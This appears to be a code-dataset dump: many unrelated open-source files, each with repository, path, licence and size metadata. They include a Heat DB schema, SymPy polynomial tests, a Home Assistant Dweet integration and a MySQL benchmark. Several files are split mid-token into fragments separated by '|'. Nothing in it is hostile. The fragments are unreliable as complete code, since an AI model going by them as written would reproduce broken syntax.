DATABASES: properties.Schema(
properties.Schema.LIST,
_('List of databases to be created on DB instance creation.'),
default=[],
update_allowed=True,
schema=properties.Schema(
properties.Schema.MAP,
schema={
DATABASE_CHARACTER_SET: properties.Schema(
properties.Schema.STRING,
_('Set of symbols and encodings.'),
default='utf8'
),
DATABASE_COLLATE: properties.Schema(
properties.Schema.STRING,
_('Set of rules for comparing characters in a '
'character set.'),
default='utf8_general_ci'
),
DATABASE_NAME: properties.Schema(
properties.Schema.STRING,
_('Specifies database names for creating '
'databases on instance creation.'),
required=True,
constraints=[
constraints.Length(max=64),
constraints.AllowedPattern(r'[a-zA-Z0-9_\-]+'
r'[a-zA-Z0-9_@?#\s\-]*'
|
r'[a-zA-Z0-9_\-]+'),
|
]
),
},
)
),
USERS: properties.Schema(
properties.Schema.LIST,
_('List of users to be created on DB instance creation.'),
default=[],
update_allowed=True,
schema=properties.Schema(
properties.Schema.MAP,
schema={
USER_NAME: properties.Schema(
properties.Schema.STRING,
_('User name to create a user on instance '
'creation.'),
required=True,
update_allowed=True,
constraints=[
constraints.Length(max=16),
|
franklingu/Cassandra-benchmarking
|
benchmarking/sum_up.py
|
Python
|
mit
| 1,889
| 0.004764
|
#!/usr/bin/python
import re
import csv
import os
import json
def read_csv(fn):
results = {}
with open(fn, 'rb') as csvfile:
rows = csv.reader(csvfile, delimiter=',')
for row in rows:
m = re.search('Total Transactions', row[1])
if len(row) == 7 and m:
temp = results.get(row[0])
if not temp:
results[row[0]] = {row[1]: float(row[2]), row[3]: float(row[4])}
else:
results[row[0]] = {row[1]: float(row[2]) + temp.get(row[1]),
row[3]: float(row[4]) + temp.get(row[3])}
results[row[0]]['Throughput'] = results[row[0]][row[1]] / results[row[0]][row[3]]
return results
def traverse_all_csvs(path_to_dir):
files = []
for (dirpath, dirnames, filenames) in os.walk(path_to_dir):
for fn in filenames:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
if m:
files.append(fn)
break
return files
if __name__ == '__main__':
results = {}
files = traverse_all_csvs(os.path.dirname(os.path.realpath(__file__)))
for fn in files:
m = re.search('^collections-([\-D0-9]*).csv$', fn)
results[m.group(1)] = read_csv(fn)
print json.dumps(results, indent=4, separators=(',', ': '))
with open('compilation.json', 'w') as outfile:
json.dump(results, outfile, sort_keys=True, indent=4, separators=(',', ': '))
rows = [['Type', 'Total Transactions', 'Time used', 'Throughput']]
for key, value in results.iteritems():
rows.append([key, '-', '-', '-'])
for k1, v1 in value.iteritems():
rows.append([k1, v1['Total Transactions'], v1
|
['Time used'], v1['Throughput']])
wi
|
th open('compilation.csv', 'wb') as f:
writer = csv.writer(f)
writer.writerows(rows)
|
johnjohnlin/nicotb
|
lib/event.py
|
Python
|
gpl-3.0
| 1,550
| 0.013548
|
# Copyright (C) 2017,2019, Yu Sheng Lin, johnjohnlys@media.ee.ntu.edu.tw
# This file is part of Nicotb.
# Nicotb is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Nicotb is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Nicotb. If not, see <http://www.gnu.org/licenses/>.
from nicotb.common import *
from collections import deque
event_released = set()
waiting_coro = list()
event_queue = deque()
def CreateEvent(hier: str = ""):
if event_released:
n = event_released.pop()
else:
n = len(waiting_coro)
waiting_coro.append(list())
if COSIM and hier:
BindEvent(n, (TOP_PREFIX+hier).encode())
return n
def CreateEvents(descs: list):
return [CreateEvent(event) for event in descs]
def GetEvent(ev):
return ev if isinstance(ev, int) else CreateEvent(ev)
def SignalEvent(ev, all_ev=True):
event_queue.append((ev, all_ev))
def DestroyE
|
vent(ev: int):
# Do not destroy events created with hier name
waiting_coro[ev] = list()
event_released.add(ev)
# Initialize a default event, so coroutines can implement SystemC-like dont_initialize
INIT_EVENT = CreateEvent()
SignalEvent(INIT_EVENT
|
)
|
jgillis/casadi
|
experimental/joel/vdp/vdp.py
|
Python
|
lgpl-3.0
| 5,909
| 0.019293
|
#
# This file is part of CasADi.
#
# CasADi -- A symbolic framework for dynamic optimization.
# Copyright (C) 2010 by Joel Andersson, Moritz Diehl, K.U.Leuven. All rights reserved.
#
# CasADi is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# CasADi is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with CasADi; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
#
# -*- coding: utf-8 -*-
import os
import sys
from numpy import *
import numpy as NP
import matplotlib.pyplot as plt
import zipfile
# JModelica
from jmodelica.jmi import compile_jmu
from jmodelica.jmi import JMUModel
import jmodelica
# CasADi
from casadi import *
curr_dir = os.path.dirname(os.path.abspath(__file__));
try:
# Try the old Jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_xml':False})
except jmodelica.compiler.UnknownOptionError:
# Try the new jmodelica syntax
jmu_name = compile_jmu("VDP_pack.VDP_Opt", curr_dir+"/VDP.mop",'optimica','ipopt',{'generate_xml_equations':True, 'generate_fmi_me_xml':False})
if True:
vdp = JMUModel(jmu_name)
res = vdp.optimize()
# Extract variable profiles
x1=res['x1']
x2=res['x2']
u=res['u']
t=res['time']
cost=res['cost']
# Plot
plt.figure(1)
plt.clf()
plt.subplot(311)
plt.plot(t,x1)
plt.grid()
plt.ylabel('x1')
plt.subplot(312)
plt.plot(t,x2)
plt.grid()
plt.ylabel('x2')
plt.subplot(313)
plt.plot(t,u)
plt.grid()
plt.ylabel('u')
plt.xlabel('time')
sfile = zipfile.ZipFile(curr_dir+'/VDP_pack_VDP_Opt.jmu','r')
mfile = sfile.extract('modelDescription.xml','.')
os.remove('VDP_pack_VDP_Opt.jmu')
os.rename('modelDescription.xml','vdp.xml')
# Allocate a parser and load the xml
parser = FMIParser('vdp.xml')
# Dump representation to screen
print "XML representation"
print parser
# Obtain the symbolic representation of the OCP
ocp = parser
|
.parse()
# Print the ocp to screen
print ocp
# Sort the variables according to type
var = OCPVariables(ocp.variables)
# The right hand side of the ACADO functions
acado_in = ACADO_FCN_NUM_IN * [[]]
# Time
acado_in[ACADO_FCN_T] = [var.t_]
# Convert stl vector of variables to list of expressions
def toList(v, der=False):
ret
|
= []
for i in v:
if der:
ret.append(i.der())
else:
ret.append(i.var())
return ret
# Differential state
acado_in[ACADO_FCN_XD] = toList(ocp.x_)
# Algebraic state
acado_in[ACADO_FCN_XA] = toList(ocp.z_)
# Control
acado_in[ACADO_FCN_U] = toList(ocp.u_)
# Parameter
acado_in[ACADO_FCN_P] = toList(ocp.p_)
# State derivative
acado_in[ACADO_FCN_XDOT] = toList(ocp.x_,True)
# The DAE function
ffcn_out = list(ocp.dae) + list(ocp.ae)
ffcn = SXFunction(acado_in,[ffcn_out])
# Objective function
mfcn = SXFunction(acado_in,[ocp.mterm])
# Path constraint function
cfcn = SXFunction(acado_in,[ocp.cfcn])
# Initial constraint function
rfcn = SXFunction(acado_in,[ocp.initeq])
# Create ACADO solver
ocp_solver = AcadoInterface(ffcn,mfcn,cfcn,rfcn)
# Create an integrator
dae_in = DAE_NUM_IN * [[]]
dae_in[DAE_T] = acado_in[ACADO_FCN_T]
dae_in[DAE_Y] = acado_in[ACADO_FCN_XD] + acado_in[ACADO_FCN_XA]
dae_in[DAE_YDOT] = acado_in[ACADO_FCN_XDOT] + list(ssym("zdot",len(acado_in[ACADO_FCN_XA])))
dae_in[DAE_P] = acado_in[ACADO_FCN_P] + acado_in[ACADO_FCN_U]
dae = SXFunction(dae_in,[ffcn_out])
integrator = IdasIntegrator(dae)
#integrator.setOption("exact_jacobian",True)
#integrator.setOption("linear_multistep_method","bdf") # adams or bdf
#integrator.setOption("nonlinear_solver_iteration","newton") # newton or functional
integrator.setOption("number_of_fwd_dir",4)
integrator.setOption("number_of_adj_dir",0)
integrator.setOption("fsens_err_con",True)
integrator.setOption("quad_err_con",True)
integrator.setOption("abstol",1e-8)
integrator.setOption("reltol",1e-8)
integrator.setOption("is_differential",len(acado_in[ACADO_FCN_XD])*[1] + len(acado_in[ACADO_FCN_XA])*[0])
# Pass the integrator to ACADO
ocp_solver.setIntegrator(integrator)
# Set options
ocp_solver.setOption("start_time",ocp.t0)
ocp_solver.setOption("final_time",ocp.tf)
num_nodes = 30
ocp_solver.setOption("number_of_shooting_nodes",num_nodes)
ocp_solver.setOption("max_num_iterations",100)
ocp_solver.setOption("kkt_tolerance",1e-4)
ocp_solver.setOption("integrator","casadi")
ocp_solver.setOption("integrator_tolerance",1e-6)
# Initialize
ocp_solver.init()
# Set bounds on states
cfcn_lb = []
for i in ocp.cfcn_lb:
cfcn_lb.append(float(i))
ocp_solver.setInput(cfcn_lb,"lbc")
cfcn_ub = []
for i in ocp.cfcn_ub:
cfcn_ub.append(float(i))
ocp_solver.setInput(cfcn_ub,"ubc")
# Solve the optimal control problem
ocp_solver.solve()
# Print optimal cost
cost = ocp_solver.getOutputData(ACADO_COST)[0]
print "optimal cost = ", cost
# Print optimal parameters
popt = ocp_solver.getOutputData(ACADO_P_OPT)
print "optimal parameter values = ", popt
# Time grid
t_opt = NP.linspace(0,ocp.tf,num_nodes+1)
# Plot optimal control
u_opt = ocp_solver.getOutputData(ACADO_U_OPT)
plt.figure(3)
plt.plot(t_opt,u_opt)
# Plot optimal state trajectory
x_opt = ocp_solver.getOutputData(ACADO_X_OPT)
x_opt = array(x_opt) # create numpy array
x_opt = x_opt.reshape(num_nodes+1, 3)
plt.figure(4)
plt.plot(t_opt,x_opt)
# Show the plots
plt.ion()
plt.show()
|
sandeep6189/Pmp-Webapp
|
migrations/versions/4fe34588268f_.py
|
Python
|
bsd-3-clause
| 506
| 0.011858
|
"""empty message
Revision ID: 4fe34588268f
Revises: 26dba2ff3e74
Create Date: 2014-12-09 0
|
1:41:24.333058
"""
# revision identifiers, used by Alembic.
revision = '4fe34588268f'
down_revision = '26dba2ff3e74'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
| |
wy65701436/harbor
|
make/photon/prepare/utils/registry_ctl.py
|
Python
|
apache-2.0
| 1,152
| 0.002604
|
import os
from g import config_dir, templates_dir, DEFAULT_GID, DEFAULT_UID
from utils.misc import prepare_dir
from utils.jinja import render_jinja
registryctl_config_dir = os.path.join(config_dir, "registryctl")
registryctl_config_template_path = os.path.join(templates_dir, "registryctl", "config.yml.jinja")
registryctl_conf = os.path.join(config_dir, "registryctl", "config.yml")
registryctl_env_te
|
mplate_path = os.path.join(templates_dir, "registryctl", "env.jinja")
registryctl_conf_env = os.path.join(config_dir, "registryctl", "env")
levels_map = {
'debug': 'debug',
'info': 'info',
'warning': 'warn',
'error': 'error',
'fatal': 'fatal'
}
def prepare_registry_ctl(config_dict):
# prepare dir
prepare_dir(registryctl_config_dir)
# Render Registryctl env
render_jinja(
registry
|
ctl_env_template_path,
registryctl_conf_env,
**config_dict)
# Render Registryctl config
render_jinja(
registryctl_config_template_path,
registryctl_conf,
uid=DEFAULT_UID,
gid=DEFAULT_GID,
level=levels_map[config_dict['log_level']],
**config_dict)
|
dagnelies/pysos
|
test_dict.py
|
Python
|
apache-2.0
| 1,567
| 0.007658
|
import time
import test_rnd as rnd
import random
import pysos
# initialize the data
N = 1234
items = [(rnd.utf8(20), rnd.utf8(200)) for i in range(N)]
start = time.time()
db = pysos.Dict('temp/sos_dict')
#import shelve
#db = shelve.open('temp.shelve')
print("%.2fs: %d items loaded" % (time.time() - start, len(db)))
# add all items
for key,val in items:
db[key] = val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# update all values
random.shuffle(items)
for key,val in items:
db[key] = 'updated ' + val
print("%.2fs: %d items updated" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val2 = db[key]
assert val2 == 'updated ' + val
print("%.2fs: %d items read" % (time.time() - start, len(items)))
# delete all keys
random.shuffle(items)
for key,val in items:
del db[key
|
]
print("%.2fs: %d items deleted" % (time.time() - start, len(items)))
# add all keys
random.shuffle(items)
|
for key,val in items:
db[key] ='again ' + val
print("%.2fs: %d items added" % (time.time() - start, len(items)))
# read all keys again
random.shuffle(items)
for key,val in items:
val = db[key]
print("%.2fs: %d items read" % (time.time() - start, len(items)))
N = len(db)
db.close()
print("%.2fs: DB closed containing %d item" % (time.time() - start, N))
#print("free lines: %d" % len(db._free_lines))
|
chrisRubiano/TAP
|
indexing/buscar.py
|
Python
|
gpl-3.0
| 633
| 0.00158
|
import sys
import argpars
|
e
import pickle
def read_index(pickleFile):
pickleFile = open(pickleFile, 'rb')
index = pickle.load(pickleFile)
return index
def main(args):
wordIndex = read_index('indice.pickle')
docIndex = read_index('indice_doc.pickle')
wordList = args.palabras
for word in wordList:
print wordIndex[word]
# print docIndex
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Busca palabras')
parser.add_argument('p
|
alabras', metavar='N', type=str, nargs='+', help='Palabras a buscar en el indice')
args = parser.parse_args()
main(args)
|
mikaelboman/home-assistant
|
homeassistant/components/dweet.py
|
Python
|
mit
| 1,961
| 0
|
"""
A component which allows you to send data to Dweet.io.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/dweet/
"""
import logging
from datetime import timedelta
import voluptuous as vol
from homeassistant.const import EVENT_STATE_CHANGED, STATE_UNKNOWN
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers import state as state_helper
from homeassistant.util import Thr
|
ottle
_LOGGER = logging.getLogger(__name__)
DOMAIN = "dweet"
DEPENDENCIES = []
REQUIREMENTS = ['dweepy==0.2.0']
CONF_NAME = 'name'
CONF_WHITELIST = 'whitelist'
MIN_TIME_BETWEEN_UPDATES = timedelta(seconds=1)
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_NAME): cv.string,
vol.Required(CONF_WHITELIST): cv.string,
}),
}, extra=vol.ALLOW_EXTRA)
# pylint: disable=too-many-locals
def setup(hass, config):
"""Se
|
tup the Dweet.io component."""
conf = config[DOMAIN]
name = conf[CONF_NAME]
whitelist = conf.get(CONF_WHITELIST, [])
json_body = {}
def dweet_event_listener(event):
"""Listen for new messages on the bus and sends them to Dweet.io."""
state = event.data.get('new_state')
if state is None or state.state in (STATE_UNKNOWN, '') \
or state.entity_id not in whitelist:
return
try:
_state = state_helper.state_as_number(state)
except ValueError:
_state = state.state
json_body[state.attributes.get('friendly_name')] = _state
send_data(name, json_body)
hass.bus.listen(EVENT_STATE_CHANGED, dweet_event_listener)
return True
@Throttle(MIN_TIME_BETWEEN_UPDATES)
def send_data(name, msg):
"""Send the collected data to Dweet.io."""
import dweepy
try:
dweepy.dweet_for(name, msg)
except dweepy.DweepyError:
_LOGGER.error("Error saving data '%s' to Dweet.io", msg)
|
clchiou/scons_package
|
label.py
|
Python
|
mit
| 4,231
| 0
|
# Copyright (c) 2013 Che-Liang Chiou
import os
import re
from SCons.Script import Dir
class Label(object):
VALID_NAME = re.compile(r'^[A-Za-z0-9_.\-/]+$')
@classmethod
def make_label(cls, label_str):
package_str = None
target_str = None
if not isinstance(label_str, str):
# Assume it is a SCons File node.
label_
|
str = label_str.srcnode().path
package_str, target_str = os.path.split(label_str)
elif label_str.startswith('#'):
label_str = label_str[1:]
if ':' in label_str:
|
package_str, target_str = label_str.split(':', 1)
else:
package_str = label_str
elif label_str.startswith(':'):
target_str = label_str[1:]
else:
target_str = label_str
package_name = PackageName.make_package_name(package_str)
if not target_str:
target_str = os.path.basename(package_name.path)
target_name = TargetName(target_str)
return cls(package_name, target_name)
@classmethod
def make_label_list(cls, label_strs):
if isinstance(label_strs, str):
label_strs = label_strs.split()
return [cls.make_label(label_str) for label_str in label_strs]
@staticmethod
def check_name(name):
if not name:
raise ValueError('empty name')
if name.startswith('/') or name.endswith('/'):
raise ValueError('leading or trailing path separator: %s' % name)
if '//' in name:
raise ValueError('consecutive path separators: %s' % name)
if not Label.VALID_NAME.match(name):
raise ValueError('invalid name character: %s' % name)
def __init__(self, package_name, target_name):
assert isinstance(package_name, PackageName)
assert isinstance(target_name, TargetName)
self.package_name = package_name
self.target_name = target_name
def __str__(self):
return '#%s:%s' % (self.package_name, self.target_name)
def __repr__(self):
return '%s("%s")' % (self.__class__.__name__, str(self))
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(repr(self))
@property
def path(self):
return os.path.join(self.package_name.path, self.target_name.path)
class LabelOfRule(Label):
pass
class LabelOfFile(Label):
pass
class PackageName(object):
@classmethod
def make_package_name(cls, package_str=None):
assert package_str is None or isinstance(package_str, str)
if not package_str:
package_str = Dir('.').srcnode().path
return cls(package_str)
def __init__(self, package_name):
assert isinstance(package_name, str)
Label.check_name(package_name)
self.package_name = package_name
def __str__(self):
return self.package_name
def __repr__(self):
return 'PackageName("%s")' % self.package_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.package_name == other.package_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.package_name)
@property
def path(self):
return self.package_name
class TargetName(object):
def __init__(self, target_name):
assert isinstance(target_name, str)
Label.check_name(target_name)
self.target_name = target_name
def __str__(self):
return self.target_name
def __repr__(self):
return 'TargetName("%s")' % self.target_name
def __eq__(self, other):
return (self.__class__ is other.__class__ and
self.target_name == other.target_name)
def __ne__(self, other):
return not (self == other)
def __hash__(self):
return hash(self.target_name)
@property
def path(self):
return self.target_name
|
abloomston/sympy
|
sympy/polys/tests/test_polytools.py
|
Python
|
bsd-3-clause
| 106,107
| 0.001301
|
"""Tests for user-friendly public interface to polynomial functions. """
from sympy.polys.polytools import (
Poly, PurePoly, poly,
parallel_poly_from_expr,
degree, degree_list,
LC, LM, LT,
pdiv, prem, pquo, pexquo,
div, rem, quo, exquo,
half_gcdex, gcdex, invert,
subresultants,
resultant, discriminant,
terms_gcd, cofactors,
gcd, gcd_list,
lcm, lcm_list,
trunc,
monic, content, primitive,
compose, decompose,
sturm,
gff_list, gff,
sqf_norm, sqf_part, sqf_list, sqf,
factor_list, factor,
intervals, refine_root, count_roots,
real_roots, nroots, ground_roots,
nth_power_roots_poly,
cancel, reduced, groebner,
GroebnerBasis, is_zero_dimensional,
_torational_factor_list,
to_rational_coeffs)
from sympy.polys.polyerrors import (
MultivariatePolynomialError,
ExactQuotientFailed,
PolificationFailed,
ComputationFailed,
UnificationFailed,
RefinementFailed,
GeneratorsNeeded,
GeneratorsError,
PolynomialError,
CoercionFailed,
DomainError,
OptionError,
FlagError)
from sympy.polys.polyclasses import DMP
from sympy.polys.fields import field
from sympy.polys.domains import FF, ZZ, QQ, RR, EX
from sympy.polys.domains.realfield import RealField
from sympy.polys.orderings import lex, grlex, grevlex
from sympy import (
S, Integer, Rational, Float, Mul, Symbol, sqrt, Piecewise,
exp, sin, tanh, expand, oo, I, pi, re, im, RootOf, Eq, Tuple, Expr)
from sympy.core.basic import _aresame
from sympy.core.compatibility import iterable
from sympy.core.mul import _keep_coeff
from sympy.utilities.pytest import raises, XFAIL
from sympy.abc import a, b, c, d, p, q, t, w, x, y, z
from sympy import MatrixSymbol
def _epsilon_eq(a, b):
for x, y in zip(a, b):
if abs(x - y) > 1e-10:
return False
return True
def _strict_eq(a, b):
if type(a) == type(b):
if iterable(a):
if len(a) == len(b):
return all(_strict_eq(c, d) for c, d in zip(a, b))
else:
return False
else:
return isinstance(a, Poly) and a.eq(b, strict=True)
else:
return False
def test_Poly_from_dict():
K = FF(3)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{0: 1, 1: 5}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict(
{(0,): 1, (1,): 5}, gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_dict({(0, 0): 1, (1, 1): 2}, gens=(
x, y), domain=K).rep == DMP([[K(2), K(0)], [K(1)]], K)
assert Poly.from_dict({0: 1, 1: 2}, gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{0: 1, 1: 2}, gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_dict(
{(0,): 1, (1,): 2}, gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_dict({(1,): sin(y)}, gens=x, composite=False) == \
Poly(sin(y)*x, x, domain='EX')
assert Poly.from_dict({(1,): y}, gens=x, composite=False) == \
Poly(y*x, x, domain='EX')
assert Poly.from_dict({(1, 1): 1}, gens=(x, y), composite=False) == \
Poly(x*y, x, y, domain='ZZ')
assert Poly.from_dict({(1, 0): y}, gens=(x, z), composite=False) == \
Poly(y*x, x, z, domain='EX')
def test_Poly_from_list():
K = FF(3)
assert Poly.from_list([2, 1], gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_list([5, 1], gens=x, domain=K).rep == DMP([K(2), K(1)], K)
assert Poly.from_list([2, 1], gens=x).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_list([2, 1], gens=x, field=True).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_list([2, 1], gens=x, domain=ZZ).rep == DMP([ZZ(2), ZZ(1)], ZZ)
assert Poly.from_list([2, 1], gens=x, domain=QQ).rep == DMP([QQ(2), QQ(1)], QQ)
assert Poly.from_list([0, 1.0], gens=x).rep == DMP([RR(1.0)], RR)
assert Poly.from_list([1.0, 0], gens=x).rep == DMP([RR(1.0), RR(0.0)], RR)
raises(MultivariatePolynomialError, lambda: Poly.from_list([[]], gens=(x, y)))
def test_Poly_from_poly():
f = Poly(x + 7, x, domain=ZZ)
g = Poly(x + 2, x, modulus=3)
h = Poly(x + y, x, y, domain=ZZ)
K = FF(3)
assert Poly.from_poly(f) == f
assert Poly.from_poly(f, domain=K).rep == DMP([K(1), K(1)], K)
assert Poly.from_poly(f, domain=ZZ).rep == DMP([1, 7], ZZ)
assert Poly.from_poly(f, domain=QQ).rep == DMP([1, 7], QQ)
assert Poly.from_poly(f, gens=x) == f
assert Poly.from_poly(f, gens=x, domain=K).rep == DMP([K(1), K(1)], K)
assert Poly.from_poly(f, gens=x, domain=ZZ).rep == DMP([1, 7], ZZ)
assert Poly.from_poly(f, gens=x, domain=QQ).rep == DMP([1, 7], QQ)
assert Poly.from_poly(f, gens=y) == Poly(x + 7, y, domain='ZZ[x]')
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=K))
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=ZZ))
raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain
|
=QQ))
assert Poly.from_poly(f, gens=(x, y)) == Poly(x + 7, x, y, domain='ZZ')
assert Poly.from_poly(
|
f, gens=(x, y), domain=ZZ) == Poly(x + 7, x, y, domain='ZZ')
assert Poly.from_poly(
f, gens=(x, y), domain=QQ) == Poly(x + 7, x, y, domain='QQ')
assert Poly.from_poly(
f, gens=(x, y), modulus=3) == Poly(x + 7, x, y, domain='FF(3)')
K = FF(2)
assert Poly.from_poly(g) == g
assert Poly.from_poly(g, domain=ZZ).rep == DMP([1, -1], ZZ)
raises(CoercionFailed, lambda: Poly.from_poly(g, domain=QQ))
assert Poly.from_poly(g, domain=K).rep == DMP([K(1), K(0)], K)
assert Poly.from_poly(g, gens=x) == g
assert Poly.from_poly(g, gens=x, domain=ZZ).rep == DMP([1, -1], ZZ)
raises(CoercionFailed, lambda: Poly.from_poly(g, gens=x, domain=QQ))
assert Poly.from_poly(g, gens=x, domain=K).rep == DMP([K(1), K(0)], K)
K = FF(3)
assert Poly.from_poly(h) == h
assert Poly.from_poly(
h, domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(h, domain=K).rep == DMP([[K(1)], [K(1), K(0)]], K)
assert Poly.from_poly(h, gens=x) == Poly(x + y, x, domain=ZZ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=ZZ))
assert Poly.from_poly(
h, gens=x, domain=ZZ[y]) == Poly(x + y, x, domain=ZZ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=QQ))
assert Poly.from_poly(
h, gens=x, domain=QQ[y]) == Poly(x + y, x, domain=QQ[y])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, modulus=3))
assert Poly.from_poly(h, gens=y) == Poly(x + y, y, domain=ZZ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=ZZ))
assert Poly.from_poly(
h, gens=y, domain=ZZ[x]) == Poly(x + y, y, domain=ZZ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=QQ))
assert Poly.from_poly(
h, gens=y, domain=QQ[x]) == Poly(x + y, y, domain=QQ[x])
raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, modulus=3))
assert Poly.from_poly(h, gens=(x, y)) == h
assert Poly.from_poly(
h, gens=(x, y), domain=ZZ).rep == DMP([[ZZ(1)], [ZZ(1), ZZ(0)]], ZZ)
assert Poly.from_poly(
h, gens=(x, y), domain=QQ).rep == DMP([[QQ(1)], [QQ(1), QQ(0)]], QQ)
assert Poly.from_poly(
h, gens=(x, y), domain=K).rep == DMP([[K(1)], [K(1), K(0)]],
|
mateusz-blaszkowski/PerfKitBenchmarker
|
perfkitbenchmarker/linux_benchmarks/mysql_service_benchmark.py
|
Python
|
apache-2.0
| 33,031
| 0.004874
|
# Copyright 2014 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""MySQL Service Benchmarks.
This is a set of benchmarks that measures performance of MySQL Databases on
managed MySQL services.
- On AWS, we will use RDS+MySQL.
- On GCP, we will use Cloud SQL v2 (Performance Edition). As of July 2015, you
will need to request to whitelist your GCP project to get access to Cloud SQL
v2. Follow instructions on your GCP's project console to do that.
As other cloud providers deliver a managed MySQL service, we will add it here.
"""
import json
import logging
import re
import StringIO
import time
import uuid
from perfkitbenchmarker import benchmark_spec as benchmark_spec_class
from perfkitbenchmarker import configs
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.aws import aws_network
from perfkitbenchmarker.providers.aws import util
FLAGS = flags.FLAGS
flags.DEFINE_enum(
'mysql_svc_db_instance_cores', '4', ['1', '4', '8', '16'],
'The number of cores to be provisioned for the DB instance.')
flags.DEFINE_integer('mysql_svc_oltp_tables_count', 4,
'The number of tables used in sysbench oltp.lua tests')
flags.DEFINE_integer('mysql_svc_oltp_table_size', 100000,
'The number of rows of each table used in the oltp tests')
flags.DEFINE_integer('sysbench_warmup_seconds', 120,
'The duration of the warmup run in which results are '
'discarded, in seconds.')
flags.DEFINE_integer('sysbench_run_seconds', 480,
'The duration of the actual run in which results are '
'collected, in seconds.')
flags.DEFINE_integer('sysbench_thread_count', 16,
'The number of test threads on the client side.')
flags.DEFINE_integer('sysbench_latency_percentile', 99,
'The latency percentile we ask sysbench to compute.')
flags.DEFINE_integer('sysbench_report_interval', 2,
'The interval, in seconds, we ask sysbench to report '
'results.')
BENCHMARK_NAME = 'mysql_service'
BENCHMARK_CONFIG = """
mysql_service:
description: MySQL service benchmarks.
vm_groups:
default:
vm_spec: *default_single_core
"""
# Query DB creation status once every 15 seconds
DB_STATUS_QUERY_INTERVAL = 15
# How many times we will wait for the service to create the DB
|
# total wait time is therefore: "query interval * query limit"
|
DB_STATUS_QUERY_LIMIT = 200
# Map from FLAGs.mysql_svc_db_instance_cores to RDS DB Type
RDS_CORE_TO_DB_CLASS_MAP = {
'1': 'db.m3.medium',
'4': 'db.m3.xlarge',
